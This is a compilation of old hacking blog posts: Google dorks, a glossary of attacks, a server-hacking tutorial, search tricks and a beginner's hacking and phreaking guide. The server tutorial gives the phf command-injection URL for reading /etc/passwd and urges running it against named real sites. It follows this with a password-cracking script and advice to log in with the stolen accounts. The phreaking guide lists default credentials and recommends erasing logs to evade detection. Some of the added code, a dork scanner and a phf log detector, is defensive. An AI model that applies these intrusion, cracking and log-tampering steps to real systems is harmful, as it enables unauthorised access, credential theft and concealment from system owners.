Google Hack


They call them ‘googledorks’ (gOO gôl’Dôrk, noun, slang): an inept or foolish person as revealed by Google.

Google dorks are the centre of Google hacking: search queries crafted so that the results are pages that expose something they shouldn’t, such as a directory listing, an admin console or a configuration file. Many hackers use Google to find vulnerable web pages this way and later use those weaknesses to break in.

Example Dorks:-

1. CGI directories contain scripts which can often be exploited by attackers. Click here for the Google search ==> “index of cgi-bin”.
This finds servers whose /cgi-bin/ directory has directory listing enabled, so every script name is visible to anyone; some of those scripts may be vulnerable.

2. Another famous Google dork is the phpMyAdmin dork. phpMyAdmin is a widely used web front end for administering MySQL databases.

Its default security mechanism is to leave it up to the admin of the website to put a .htaccess file in the application’s directory (or to turn on phpMyAdmin’s own login). Well, guess what: obviously some admins are either too lazy or don’t know how to secure their directories.

Click here for the Google search ==> “Welcome to phpMyAdmin” “Create new database”
Both phrases appear on phpMyAdmin’s main page, which you only reach once you are past the login, so an indexed hit is an instance that anyone can administer without a password.
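The two dorks above are easiest to understand as predicates over what a search engine has indexed, which also means you can run them against your own site before Google does. The following Python script, added here and not part of the original page, does exactly that for a handful of operators (quoted phrases, intitle:, inurl:, intext:, site:, filetype: and the leading minus for negation). The three pages under intranet.example are constructed for the demo, and the normalize() and parse_dork() helpers are this example’s own approximation of how a search engine tokenizes, not anything Google publishes.

```python
"""Run Google-style dorks against a local snapshot of your own site.

Added example, not from the original page: the same dorks an attacker
types into Google, evaluated offline against pages you crawled yourself,
so an exposed directory listing or an unauthenticated phpMyAdmin shows up
before the search engine indexes it. PAGES and the intranet.example
hostname are constructed for the demo.
"""
import re
import shlex
from urllib.parse import urlsplit

PAGES = [
    {"url": "http://intranet.example/cgi-bin/",
     "title": "Index of /cgi-bin",
     "body": "Index of /cgi-bin Parent Directory phf test-cgi nph-test-cgi"},
    {"url": "http://intranet.example/phpmyadmin/index.php",
     "title": "phpMyAdmin",
     "body": "Welcome to phpMyAdmin Create new database MySQL - root@localhost"},
    {"url": "http://intranet.example/docs/report.pdf",
     "title": "Quarterly report",
     "body": "Revenue tables, nothing operational."},
]

# The two dorks from the text, plus one using operators and a negation.
DORKS = {
    "cgi-directory-listing": '"index of cgi-bin"',
    "phpmyadmin-open": '"Welcome to phpMyAdmin" "Create new database"',
    "pdf-on-intranet": 'site:intranet.example filetype:pdf -intitle:phpmyadmin',
}

OPERATORS = {"intitle", "inurl", "intext", "site", "filetype"}


def normalize(text: str) -> str:
    """Lower-case and turn runs of punctuation into single spaces, roughly the
    way a search engine tokenizes, so "index of cgi-bin" matches "Index of /cgi-bin"."""
    return " ".join(re.sub(r"[^a-z0-9]+", " ", text.lower()).split())


def parse_dork(dork: str):
    """Split a dork into (negated, operator, term) clauses. Quoted phrases stay
    whole, and 'op:term' is only split for a known operator, so a quoted URL
    containing a colon is not mangled."""
    clauses = []
    for token in shlex.split(dork):
        negated = token.startswith("-")
        if negated:
            token = token[1:]
        op, sep, rest = token.partition(":")
        if sep and op.lower() in OPERATORS:
            clauses.append((negated, op.lower(), rest))
        else:
            clauses.append((negated, "any", token))
    return clauses


def clause_matches(page: dict, op: str, term: str) -> bool:
    url = page["url"]
    if op == "site":
        host = urlsplit(url).hostname or ""
        return host == term.lower() or host.endswith("." + term.lower())
    if op == "filetype":
        return urlsplit(url).path.lower().endswith("." + term.lower())
    if op == "inurl":
        return normalize(term) in normalize(url)
    if op == "intitle":
        return normalize(term) in normalize(page["title"])
    if op == "intext":
        return normalize(term) in normalize(page["body"])
    # bare term or quoted phrase: title or body, like an unqualified query
    return normalize(term) in normalize(page["title"] + " " + page["body"])


def page_matches(page: dict, dork: str) -> bool:
    """Every clause must hold (negated clauses must fail)."""
    return all(clause_matches(page, op, term) != negated
               for negated, op, term in parse_dork(dork))


def run_dorks(pages, dorks):
    """Map each dork name to the URLs it would surface."""
    return {name: [p["url"] for p in pages if page_matches(p, dork)]
            for name, dork in dorks.items()}


if __name__ == "__main__":
    for name, urls in run_dorks(PAGES, DORKS).items():
        print(f"{name}: {urls or 'no exposure'}")
```

Feed run_dorks() the pages from your own crawler (or a sitemap plus fetched titles and bodies) and the dorks you care about from a public dork list; anything it returns is what a search engine will eventually show the world.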

Honeypot

Honeypots or honeypages are web pages designed to attract Google dorkers, i.e. Google hackers. Search Google for “index of /etc/passwd”.

The first link you find is a very famous gray-world.net honeypot, which exists to record who runs that query. The biggest database of Google dorks is the Google Hacking Database (GHDB), originally maintained by Johnny Long.

Computer Attacks You’ve Never Heard Of


Malware is serious business: it can slow PCs down to a crawl, or worse. On the other hand, some of the names security researchers have chosen for these annoying (and often damaging) pieces of code are downright charming.
Here are nine that stand out, followed by seven most people have heard of:
The Security Attacks Most People Have Never Heard Of

Smishing: Smishing, or “SMS phishing”, is a phishing attack that specifically targets mobile phones. The victim receives an SMS with a hyperlink that either installs malware on the phone or leads the user to a phishing site formatted for mobile screens. The term was coined by David Rayhawk in a McAfee Avert Labs blog.
Botnet (Zombie PCs): A portmanteau of “robot” and “network”, a botnet is any number of Internet-connected computers that, unbeknownst to their owners, are controlled remotely by an attacker and used to send spam, spread malware or attack other systems. The infected computers are also known as “zombies”. Distributed denial-of-service (DDoS) attacks often rely on thousands of zombie PCs.
BlueBugging: Bluebugging (not to be confused with bluesnarfing, which only reads data off the phone) lets an attacker take control of a mobile phone over Bluetooth, usually without any notification or alert to the phone’s owner: placing calls, reading and sending SMS messages, erasing phonebook contacts, tapping conversations and other malicious activities. It was first demonstrated in 2004 by the German researcher Martin Herfurt. The main limitation is range: the attacker has to be within Bluetooth range of the phone, nominally about 10 metres for a Class 2 device, although directional antennas have been used to stretch that considerably.
Pod Slurping: Coined by US security expert Abe Usher, “pod slurping” is when an iPod or any portable USB storage device surreptitiously copies large amounts of files from a computer to its own storage. Pod slurping is becoming an increasing security risk to companies and government agencies. Typically, access is gained while the computer is unattended, and the process can take as little as 65 seconds.
Ransomware: A program that encrypts files or locks the computer so that it is near unusable, then demands payment for the user to regain full access: it “kidnaps” the computer. Encrypting ransomware is also commonly referred to as a “cryptovirus” or “cryptotrojan”. Examples of ransomware include Gpcode.AK, Krotten and Archiveus. The first known ransomware was the 1989 PC Cyborg (AIDS) trojan, written by Dr. Joseph Popp.
Scareware: Scareware is software that tricks people into downloading or purchasing it under the guise of fixing their computer, when in reality the fake anti-virus program is the real problem. Scareware programs run a fictitious or careless system scan, then present the user with a list of malicious programs that must be removed, always leaving itself off the list. The scareware then tells the user that fixing these “problems” requires paying a fee for a “full” or “registered” version of the software. Examples of scareware include System Security, Anti-Virus 2010 and Registry Cleaner XP.
Sidejacking: Sidejacking is a technique for taking over your account on a specific website. Sites usually send the login itself over an encrypted connection, so the password cannot be sniffed, but then hand back a session id (some random data in the URL or, more often, in an HTTP cookie) that travels in the clear with every later request. Anyone on the same network, an open Wi-Fi hotspot for instance, who captures that session id can present it and be treated as the logged-in user: reading your email, looking at what you have bought online, controlling your social network account, and so on. The term comes from Robert Graham, who pulled together a variety of known and new weaknesses into an automated session snatcher (the Ferret sniffer and Hamster proxy, shown at Black Hat in 2007). The defence is to run the whole session over HTTPS and mark the session cookie Secure so it is never sent in the clear.
Black Hat: “Black hat” hackers are people who specialise in unauthorised breaches of information systems, often those containing sensitive information. They may attack systems for profit, for fun or for political motives. Attacks often involve unauthorised modification or destruction of data. They also may distribute viruses and Internet worms and deliver spam through the use of botnets.
White Hat: A “white hat” hacker is an individual who identifies a security weakness in a computer system or network but, instead of maliciously exploiting it, reports the weakness so it can be fixed, protecting the network from unwanted intrusions or attacks. The term is taken from old western films, where the white-hat cowboy is the hero and the black-hat the villain.
The Attacks Everyone Sort of Understands

Worm: A worm is a self-replicating program that spreads from computer to computer over a network on its own, without attaching itself to another program or waiting for a user to run it. The name comes from experiments at the Xerox Palo Alto Research Center in the late 1970s and early 1980s, where John Shoch and Jon Hupp wrote worms to spread useful computation across idle machines. The 1988 Morris worm showed how the same mechanism could bring networks down, and later worms carry payloads that alter or erase data; often they leave files irretrievably corrupted or slow the PC down to a crawl.
Trojan Horse: A long-standing and common infection found even on the newest computers, this destructive program disguises itself as a harmless application. Although trojans are incapable of self-replication, they are just as destructive as a computer virus. True to its Greek origin, a trojan horse often opens a backdoor into your computer, enabling further infections and allowing hackers to control the PC. The term is credited to Dan Edwards, an MIT hacker who went on to the NSA.
Phishing: Originated by hackers who stole America Online accounts by scamming passwords from unsuspecting users, “phishing” is the crime of extracting sensitive information from third parties (the phishing victims): usernames, passwords, banking information and credit card numbers. It is typically done by sending an e-mail that fraudulently claims to be from a legitimate company, or by redirecting someone to a website that looks legitimate but isn’t. The stolen credentials are then used for account takeover and identity theft.
Script Kiddies: A term attributed to Marcus Ranum, “script kiddie” (plural kiddies) is a derogatory name used by more skilled hackers for young or inexperienced ones who attack computer networks with cheap techniques, pre-written scripts and sometimes outside help, without understanding how the exploit works. They can still be just as much of a threat or annoyance; the difference is that these untrained hackers are often unaware of the potential consequences of their actions.
Keylogging: A keylogger records every keystroke typed on a machine, either as software on the host or as a hardware device between keyboard and computer, and typically sends the log back to the attacker; because it captures what is typed before any encryption happens, it defeats encrypted logins. The earliest widely cited software keylogger was one Perry Kivolowitz posted to a Usenet newsgroup in 1983. Keylogging has since become increasingly common, not to mention dangerous. Not every instance of keylogging is illegal, though: it is sometimes used to monitor teens and children.
Social Engineering: Brought to public attention by Kevin Mitnick (a well-known hacker back in the day), social engineering is obtaining, or attempting to obtain, private data by persuading a person to reveal otherwise protected information rather than by attacking the computer directly. The information released by victims is then used to attack the network. One common example: an employee at a large company is convinced to give out his employee identification, which is then used to gain further access to the company’s network and, often, sensitive information.
Crapware: Originally coined by Marc Orchant on his ZDNet blog, crapware is software that uses up a computer’s resources (disk space, memory and CPU) without being wanted or used by the computer’s owner. Crapware ranges from software preloaded on the system before sale to programs downloaded from the Internet without the user’s knowledge or consent. One of the more common examples is the AOL client preinstalled by PC manufacturers.
Av a try!! 😀

> Hacking Servers?? <


I am asked at least five times a day by beginning “hackers”, “How can I hack?” or “Is there a way to hack a web site?” Well, there is. There are, in fact, literally hundreds of ways to do it. I will discuss a few in this text to get you started. Every hacker has to start somehow, and hacking web servers and FTP servers is one of the easiest ways. If you are reading this I am assuming that you already have a basic knowledge of how web servers work and how to use some form of UNIX. But I am going to explain that stuff anyway for those of you who don’t know.

Part 1: Simple UNIX Commands

Most DOS commands have UNIX and Linux equivalents. Listed below are some of the main commands you will need to know to use a shell account (UNIX commands are case sensitive and almost always lower case).

HELP = man <command>
COPY = cp
MOVE = mv
DIR = ls
DEL = rm
CD = cd

To see who else is on the system, type who. To get information about a specific user on the system, type finger <username>. Using those basic UNIX commands you can learn all you need to know about the system you are using.

Part 2: Cracking Passwords

On UNIX systems the file that lists the accounts on the system is /etc/passwd. I bet you’re thinking, “Great. All I have to do is get the file called /etc/passwd and I’ll be a hacker.” If that is what you are thinking then you are dead wrong. The second field of each entry is not the password but a one-way hash of it, produced by crypt(3) from the password and a two-character salt, and there is no way to turn the hash back into the password. What you can do is guess: take a dictionary of candidate words, run each one through the same hash with the account’s salt, and see whether the result equals the stored field. The program that I have found to be the best password cracker is called “Cracker Jack”. It uses a dictionary file composed of thousands of words, compares the hashed forms of those words to the hashes in the passwd file and notifies you when it finds a match. Cracker Jack can be found at my web site, http://www.geocities.com/SiliconValley/9185. Some wordlists can be found at the following FTP site: sable.ox.ac.uk/pub/wordlists. To get to the wordlist that I usually use, go to that FTP site, then go to the American directory and download the file called dic-0294.tar.Z.

Part 3: The Hard Part (Finding Password Files)

Up till now I have been telling you the easy parts of hacking a server. Now we get to the more difficult part. It’s common sense: if the system administrator has a file that holds the password hashes for everyone on his or her system, they are not going to just give it to you. You have to have a way to retrieve the /etc/passwd file without logging into the system. There are two simple ways that this can sometimes be accomplished.

The first is anonymous FTP. Often the /etc directory is not blocked from FTP. A chrooted anonymous FTP area normally has its own ~ftp/etc/passwd so that ls can show owner names, and it is supposed to contain no real hashes, but careless sites copy the real file there or serve the real /etc. So use an FTP client to access the site anonymously and check whether /etc/passwd is readable. If it is not restricted, download the file and run Cracker Jack on it. If it is restricted, try plan B.

Plan B is the phf script. On some systems there is a CGI program called phf in the /cgi-bin directory (a phone-book lookup sample that shipped with NCSA httpd and early Apache). If there is, you are in luck. phf passed its query to a shell without stripping an encoded newline (%0a), so whatever follows the newline runs as a separate command and its output, the contents of /etc/passwd for instance, comes back in the web page. To try this method, go to your web browser and type in this URL:
http://xxx.xxx.xxx/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
Then substitute the site you are trying to hack for the xxx.xxx.xxx.
For example, if I wanted to hack St. Louis University (and I have already) I
would type in http://www.slu.edu/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
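From the defender’s side, the phf trick above leaves a very recognisable trail in the web server’s access log: a request for /cgi-bin/phf whose query string contains an encoded newline, usually followed by a reference to /etc/passwd. The script below, an added example and not code from the original text, parses NCSA/Apache combined-format log lines, percent-decodes the request target (twice, so double encoding such as %252e does not slip through) and tags each line with what it finds. The five SAMPLE_LOG lines and the addresses in them are constructed; the tag names are this example’s own.

```python
"""Flag phf-style CGI command injection and password-file grabs in web logs.

Added example, not part of the original text. SAMPLE_LOG is constructed
for the demo; the addresses and timestamps are not real.
"""
import re
from urllib.parse import unquote

SAMPLE_LOG = """\
10.0.0.7 - - [12/Oct/1996:03:14:07 +0000] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 200 2163 "-" "Mozilla/3.0"
10.0.0.7 - - [12/Oct/1996:03:14:09 +0000] "GET /cgi-bin/phf?Qalias=x%0a/bin/id HTTP/1.0" 200 48 "-" "Mozilla/3.0"
192.0.2.5 - - [12/Oct/1996:03:15:00 +0000] "GET /index.html HTTP/1.0" 200 1024 "-" "Mozilla/3.0"
192.0.2.9 - - [12/Oct/1996:03:16:21 +0000] "GET /cgi-bin/phf?Qname=smith HTTP/1.0" 200 512 "-" "Lynx/2.6"
198.51.100.3 - - [12/Oct/1996:03:17:40 +0000] "GET /images/%2e%2e/%2e%2e/etc/passwd HTTP/1.0" 404 210 "-" "Mozilla/3.0"
"""

# NCSA/Apache "combined" format: ip ident user [time] "METHOD target PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: [^"]*)?" (?P<status>\d{3}) (?P<size>\S+)')

PASSWD_RE = re.compile(r"/etc/(passwd|shadow|master\.passwd)")


def decode_target(target: str) -> str:
    """Percent-decode twice so double-encoded sequences (%252e -> %2e -> .) are seen."""
    return unquote(unquote(target))


def classify(line: str):
    """Parse one log line; return its fields plus a list of tags, or None if unparsable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    decoded = decode_target(m.group("target"))
    # split by hand: urlsplit() silently strips \n and \r, which is exactly what we look for
    path, _, query = decoded.partition("?")
    tags = []
    if path.lower().startswith("/cgi-bin/phf"):
        tags.append("cgi-phf")            # the vulnerable sample script is reachable at all
    if "\n" in query or "\r" in query:
        tags.append("newline-injection")  # %0a/%0d: the unfiltered newline phf passed to the shell
    if "/../" in path or path.startswith("../"):
        tags.append("traversal")
    if PASSWD_RE.search(decoded):
        tags.append("passwd-file")
    return {"ip": m.group("ip"), "target": m.group("target"),
            "status": int(m.group("status")), "tags": tags}


def scan(lines):
    """Return only the flagged entries, in log order."""
    hits = []
    for line in lines:
        entry = classify(line)
        if entry and entry["tags"]:
            hits.append(entry)
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG.splitlines()):
        print(f'{hit["ip"]:15} {hit["status"]} {",".join(hit["tags"]):40} {hit["target"]}')
```

The legitimate phone-book lookup (Qname=smith) still earns a cgi-phf tag on its own, which is deliberate: the right response to seeing the script answer at all is to delete it, not to wait for the newline.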

Don’t bother trying http://www.slu.edu because I have already done it and told them about their security flaw.
Here’s a hint: try http://www.spawn.com and http://www.garply.com. If the preceding two methods fail, then try any way you can think of to get that file. If you do get the file and all the items in the second field are x, ! or *, then the password file is shadowed. Shadowing moves the hashes out of the world-readable /etc/passwd into /etc/shadow, which only root can read, so the copy you got gives you the usernames but nothing to crack. There is no way to “unshadow” a password file from the outside, but sometimes there are backup copies of the old unshadowed file that aren’t protected, so look for /etc/shadow itself (in case its permissions are wrong) and for anything like that which you can actually read.
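Parts 2 and 3 come down to one loop: read the second field of every passwd entry, decide whether it is a hash, a shadow or lock marker (x, * or !) or empty, and for the real hashes try each wordlist entry under the account’s own salt. The Python below is an added example, not Cracker Jack or any code from the original text. Because Python’s crypt module is deprecated since 3.11 and gone in 3.13, the constructed PASSWD_FILE uses a stand-in hash format, $toy$<salt>$<sha256 of salt+password>, in place of crypt(3) output; toy_crypt(), PasswdEntry and the candidate-mangling rules are this example’s own, and the accounts and passwords in the sample file are made up.

```python
"""Read a UNIX passwd file, spot shadowed entries, and run a wordlist against
the hashes that are present.

Added example, not code from the original text or from Cracker Jack. The
passwd snapshot below is constructed. Its hashes use a stand-in format,
"$toy$<salt>$<sha256 hex of salt+password>", so the script runs without the
deprecated `crypt` module; a real run would compute crypt(3) with the salt
taken from the stored hash instead. The attack loop is otherwise the one the
text describes.
"""
import hashlib
from dataclasses import dataclass
from typing import Dict, Iterator, List


def toy_crypt(password: str, salt: str) -> str:
    """Stand-in for crypt(3): salted SHA-256, labelled with a $toy$ prefix."""
    digest = hashlib.sha256((salt + password).encode()).hexdigest()
    return f"$toy${salt}${digest}"


# Constructed passwd snapshot (not from any real system).
PASSWD_FILE = "\n".join([
    "root:" + toy_crypt("toor", "ab") + ":0:0:root:/root:/bin/sh",
    "demo::101:100:Demo account:/home/demo:/bin/sh",           # empty field: no password at all
    "alice:" + toy_crypt("Secret1", "Qz") + ":1001:100:Alice:/home/alice:/bin/ksh",
    "bob:x:1002:100:Bob:/home/bob:/bin/sh",                     # "x": hash lives in /etc/shadow
    "daemon:*:1:1:daemon:/usr/sbin:/bin/false",                 # "*" or "!": locked, nothing matches
])
WORDLIST = ["password", "secret", "toor", "welcome"]


@dataclass
class PasswdEntry:
    name: str
    pwfield: str
    uid: int
    gid: int
    gecos: str
    home: str
    shell: str


def parse_passwd(text: str) -> List[PasswdEntry]:
    """Parse name:pw:uid:gid:gecos:home:shell lines, skipping comments and junk."""
    entries = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        f = line.split(":")
        if len(f) != 7:
            continue
        try:
            entries.append(PasswdEntry(f[0], f[1], int(f[2]), int(f[3]), f[4], f[5], f[6]))
        except ValueError:
            continue
    return entries


def classify(entry: PasswdEntry) -> str:
    """What the second field tells you before you spend any CPU on it."""
    pw = entry.pwfield
    if pw == "":
        return "no-password"   # login succeeds with an empty password
    if pw == "x":
        return "shadowed"      # real hash is in /etc/shadow, readable only by root
    if pw[0] in "*!":
        return "locked"        # older systems also used "*" to mean shadowed
    return "hash-present"


def candidates(wordlist) -> Iterator[str]:
    """Wordlist entries plus a few common mangling rules, without duplicates."""
    rules = (lambda w: w, str.capitalize, str.upper,
             lambda w: w + "1", lambda w: w.capitalize() + "1")
    seen = set()
    for word in wordlist:
        for rule in rules:
            guess = rule(word)
            if guess not in seen:
                seen.add(guess)
                yield guess


def crack(entries: List[PasswdEntry], wordlist) -> Dict[str, str]:
    """Hash each guess with each target's own salt and compare; return name -> password."""
    targets = [e for e in entries
               if classify(e) == "hash-present" and e.pwfield.startswith("$toy$")]
    found: Dict[str, str] = {}
    for guess in candidates(wordlist):
        for e in targets:
            if e.name in found:
                continue
            salt = e.pwfield.split("$")[2]   # with DES crypt this would be pwfield[:2]
            if toy_crypt(guess, salt) == e.pwfield:
                found[e.name] = guess
        if len(found) == len(targets):
            break
    return found


def summarize(text: str) -> Dict[str, List[str]]:
    """Group account names by what their password field says."""
    summary: Dict[str, List[str]] = {}
    for e in parse_passwd(text):
        summary.setdefault(classify(e), []).append(e.name)
    return summary


if __name__ == "__main__":
    print(summarize(PASSWD_FILE))
    print(crack(parse_passwd(PASSWD_FILE), WORDLIST))
```

Run against a real file, summarize() is the first thing to look at: an account in the no-password bucket needs no cracking at all, and a file where everything is shadowed or locked is not worth feeding to a cracker.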

Part 4: Logging In To “Your” New Shell

OK… This is where you use what you found with Cracker Jack: usernames and passwords. Run your telnet client and telnet to the server whose passwords you cracked, such as www.slu.edu. When you are connected it will give a login screen that asks for a login name and password, and usually prints information on the operating system the server is running (usually some flavour of UNIX: Linux, AIX, IRIX, Ultrix, BSD, or sometimes even DOS or VAX/VMS). Just type in the information you got after cracking the passwd file and use whatever you know about UNIX to do whatever you feel like doing. But remember that hacking isn’t spreading viruses or causing damage to other computer systems. It is using your knowledge to increase your knowledge.

Part 5: Newbie Info

If you feel that you have what it takes to be a serious hacker then you must first know a clear definition of hacking and how to be an ethical hacker. Become familiar with unix environments and if you are only just starting to learn to hack, visit a local library and find some books on various operating systems on the internet and how they work. Or you could go to a book store and buy a couple internet security books. They often explain how hackers penetrate systems and that is something a beginner could use as an advantage.

900D LU(|<!!

7 clever Google tricks


Below I have compiled a list of 7 clever Google tricks that I believe everyone should be aware of.  Together I think they represent the apex of the grand possibilities associated with Google search manipulation tricks and hacks.  Although there are many others out there, these 7 tricks are my all-time favorite.  Enjoy yourself.

1.  Find the Face Behind the Result – This is a neat trick you can use on a Google Image search to filter the results so that they include only images of people.  How is this useful?  Well, it could come in handy if you are looking for images of the prominent people behind popular products, companies, or geographic locations.  You can perform this search by appending &imgtype=face to the end of the URL after you perform a standard Google Image search (newer versions of Google Images expose the same filter under the Type menu, which uses the tbs=itp:face parameter instead).

2.  Google + Social Media Sites = Quality Free Stuff – If you are on the hunt for free desktop wallpaper, stock images, WordPress templates or the like, using Google to search your favorite social media sites is your best bet.  The word “free” in any standard search query immediately attracts spam.  Why wade through potential spam in standard search results when numerous social media sites have an active community of users who have already ranked and reviewed the specific free items that interest you.  All you have to do is direct Google to search through each of these individual social media sites, and bingo… you find quality content ranked by hundreds of other people.

3.  Find Free Anonymous Web Proxies – A free anonymous web proxy site allows any web browser to access other third-party websites by channeling the browser’s connection through the proxy.  The web proxy basically acts as a middleman between your web browser and the third-party website you are visiting.  Why would you want to do this?  There are two common reasons:

  • You’re connecting to a public network at a coffee shop or internet café and you want privacy while you browse the web.  You don’t want the admin to know every site you visit.
  • You want to bypass a web content filter or perhaps a server-side ban on your IP address.  Content filtering is common practice on college campus networks.  This trick will usually bypass those restrictions.

Tor (free) and paid VPN services do the same thing.  However, this trick is free and easy to access from anywhere via Google.  All you have to do is look through the search results returned by the queries below, find a proxy that works, and enter the URL of the site you want to browse anonymously.  One caveat: you are only moving your trust from the network admin to whoever runs the proxy.  A web proxy fetches every page on your behalf, so it sees everything you send and receive, passwords and cookies included, and can alter it, so never log in to anything through a free proxy you know nothing about.

4.  Google for Music, Videos, and Ebooks – Google can be used to conduct a search for almost any file type, including Mp3s, PDFs, and videos.  Open web directories are one of the easiest places to quickly find an endless quantity of freely downloadable files.  This is an oldie, but it’s a goodie!  Why thousands of webmasters incessantly fail to secure their web servers will continue to boggle our minds.

5.  Browse Open Webcams Worldwide – Take a randomized streaming video tour of the world by searching Google for live open access video webcams.  This may not be the most productive Google trick ever, but it sure is fun!  (Note: you may be prompted to install an ActiveX control or the Java runtime environment which allows your browser to view certain video stream formats.)

6.  Judge a Site by its Image – Find out what a site is all about by looking at a random selection of the images hosted on its web pages.  Even if you are somewhat familiar with the target site’s content, this can be an entertaining little exercise.  You will almost surely find something you didn’t expect to see.  All you have to do is use Google’s site: operator to target a domain in an image search.

7.  Results Based on Third-Party Opinion – Sometimes you can get a better idea of the content located within a website by reading how other websites refer to that site’s content.  The allinanchor: Google search operator can save you large quantities of time when a normal textual based search query fails to fetch the information you desire.  It conducts a search based on keywords used strictly in the anchor text, or linking text, of third party sites that link to the web pages returned by the search query.  In other words, this operator filters your search results in a way such that Google ignores the title and content of the returned web pages, but instead bases the search relevance on the keywords that other sites use to reference the results.  It can add a whole new dimension of variety to your search results.

Bonus Material:

Here is a list of my favorite Google advanced search operators, operator combinations, and related uses:

  • link:URL = lists other pages that link to the URL.
  • related:URL = lists other pages that are related to the URL.
  • site:domain.com “search term” = restricts search results to the given domain.
  • allinurl:WORDS = shows only pages with all search terms in the url.
  • inurl:WORD = like allinurl: but filters the URL based on the first term only.
  • allintitle:WORD = shows only results with terms in title.
  • intitle:WORD = similar to allintitle, but only for the next word.
  • cache:URL = will show the Google cached version of the URL.
  • info:URL = will show a page containing links to related searches, backlinks, and pages containing the url. This is the same as typing the url into the search box.
  • filetype:SOMEFILETYPE = will restrict searches to that filetype
  • -filetype:SOMEFILETYPE = will remove that file type from the search.
  • site:www.somesite.net “+www.somesite.net” = shows you how many pages of your site are indexed by google
  • allintext: = searches only within text of pages, but not in the links or page title
  • allinlinks: = searches only within links, not text or title
  • WordA OR WordB = search for either the word A or B
  • “Word” OR “Phrase” = search exact word or phrase
  • WordA -WordB = find word A but filter results that include word B
  • WordA +WordB = results must contain both Word A and Word B (Google dropped the + operator in 2011; quote the word instead)
  • ~WORD = looks up the word and its synonyms
  • ~WORD -WORD = looks up only the synonyms to the word.

How To Begin In The World Of HaCking/Phreaking


I am not responsible for any of the information in this document if it is used for any other purpose than educational reading. Some of the information on this page can be used illegally if the reader does not act responsibly.

When I got into hacking, I realized that there weren’t many text philes for newbies, so I decided to write one. I don’t really care about misspelled words or punctuation, so please ignore the mistakes. In this document I will refer you to other documents a lot (because why should I waste my time rewriting something that has already been written?). If at any time while reading this document you ask yourself “So… how do I hack?”, then go away now and save yourself the frustration, because you’ll never learn. To hack you must understand everything about a system, and then you can get ideas and try them out. I tried to keep this phile as short as possible; when you read this you should just get an idea about how to hack and why we hack. If you read this document and the philes that I have listed, you should have a good idea of what to do, how to do it, and why. Remember, every ‘project’ is different. You have to use your brain and adjust to each different one.

Tools: There are a few things you need to have to be a hacker/phreaker.

’puter – computer (duh)
terminal software – a program like HyperTerminal or an ordinary terminal program that allows you to dial out to another system.
blue box – (excerpted from the 2600 FAQ) Blue boxes use a 2600 Hz tone to seize control of telephone switches that use in-band signalling. The caller may then access special switch functions, with the usual purpose of making free long-distance phone calls, using the tones provided by the blue box.
scanner – a scanner is a program that dials out every number in your area and listens for tones that are comming from other modems. (helps you locateyour local targets) a good scanner is Toneloc. Find it!Fone (phone) line – I hope you know whut this is…It also helps to know a computer language ex: C, C++ ect.
Info resources: I don’t know many good boards anymore because almost all of their sysops (system operators) have been busted. But I suggest you get an account with a provider that gives you unlimited access to the WWW (World Wide Web) and a browser such as Netscape, and visit these good home pages by entering their names in the WebCrawler search engine (http://webcrawler.com):

Silicon Toads Hacking Resources
Flamestrike Enterprises
The Plowsk¥ Page (mine, you can reach me from there)
Matervas Hideout
Burns Lair
Cold fire

From these pages you will find a wealth of information on h/p (hacking/phreaking).
Getting started: The first thing you must do is get on your computer, open your terminal software and connect to a board (bulletin board, BBS). This is a must! (It’s also a VERY basic thing.) (You can usually find a BBS number on a home page, or enter “bbs” in a search engine.) Now that you can do that, start reading. Read as many text philes as possible.

Required reading:
Hackers Manifesto (at bottom)
Hackers Code of Ethics
Any old issues of Phrack
Any old issues of 2600
2600 FAQ
Any text documents on systems (UNIX, IRIS, DEC)
DOD (Department of Defense) standards
Any philes on boxes (blue (one at bottom), red, beige)

For beginners, which most of you probably are, I suggest you find some of the following systems that exist in your area and work on them first. (They are the easiest and least risky.)

This next segment is excerpted from:
A Novice’s Guide to Hacking – 1989 edition
by The Mentor
Legion of Doom/Legion of Hackers
IRIS- IRIS stands for Interactive Real Time Information System. It originally ran on PDP-11’s, but now runs on many other minis. You can spot an IRIS by the ‘Welcome to “IRIS” R9.1.4 Timesharing’ banner, and the ACCOUNT ID? prompt. IRIS allows unlimited tries at hacking in, and keeps no logs of bad attempts. I don’t know any default passwords, so just try the common ones from the password database below.
Common Accounts:
MANAGER
BOSS
SOFTWARE
DEMO
PDP8
PDP11
ACCOUNTING

DEC-10- An earlier line of DEC computer equipment, running the TOPS-10 operating system. These machines are recognized by their ‘.’ prompt. The DEC-10/20 series are remarkably hacker-friendly, allowing you to enter several important commands without ever logging into the system. Accounts are in the format [xxx,yyy] where xxx and yyy are integers. You can get a listing of the accounts and the process names of everyone on the system before logging in with the command .systat (for SYstem STATus). If you see an account that reads [234,1001] BOB JONES, it might be wise to try BOB or JONES or both for a password on this account. To login, you type .login xxx,yyy and then type the password when prompted for it. The system will allow you unlimited tries at an account, and does not keep records of bad login attempts. It will also inform you if the UIC you’re trying (UIC = User Identification Code, 1,2 for example) is bad.
Common Accounts/Defaults:
1,2: SYSLIB or OPERATOR or MANAGER
2,7: MAINTAIN
5,30: GAMES

UNIX- There are dozens of different machines out there that run UNIX. While some might argue it isn’t the best operating system in the world, it is certainly the most widely used. A UNIX system will usually have a prompt like ‘login:’ in lower case. UNIX also will give you unlimited shots at logging in (in most cases), and there is usually no log kept of bad attempts.
Common Accounts/Defaults: (note that some systems are case sensitive, so use lower case as a general rule. Also, many times the accounts will be unpassworded, you’ll just drop right in!)
root: root
admin: admin
sysadmin: sysadmin or admin
unix: unix
uucp: uucp
rje: rje
guest: guest
demo: demo
daemon: daemon
sysbin: sysbin

Code of ethics: Once you get into a system, do not manipulate anything but the log file (erase the record of your bad logins) and anywhere you might have left your handle (name, a.k.a.). You don’t want to leave your handle anywhere because they WILL be able to track you down by your handle alone.

It’s OK to be paranoid! Don’t think for one minute that you are undetectable; if you make any mistakes, you could get caught. Here is a list of things you could do to help yourself from getting in trouble.
* Encrypt your entire hard drive
* Hide your files in a very safe spot.
* Don’t tell anyone that you don’t know very well about your hacking. Good hackers never reveal specific details to anyone about their current project. They give only very vague hints of what they are doing.
* Don’t openly give out your real name or address
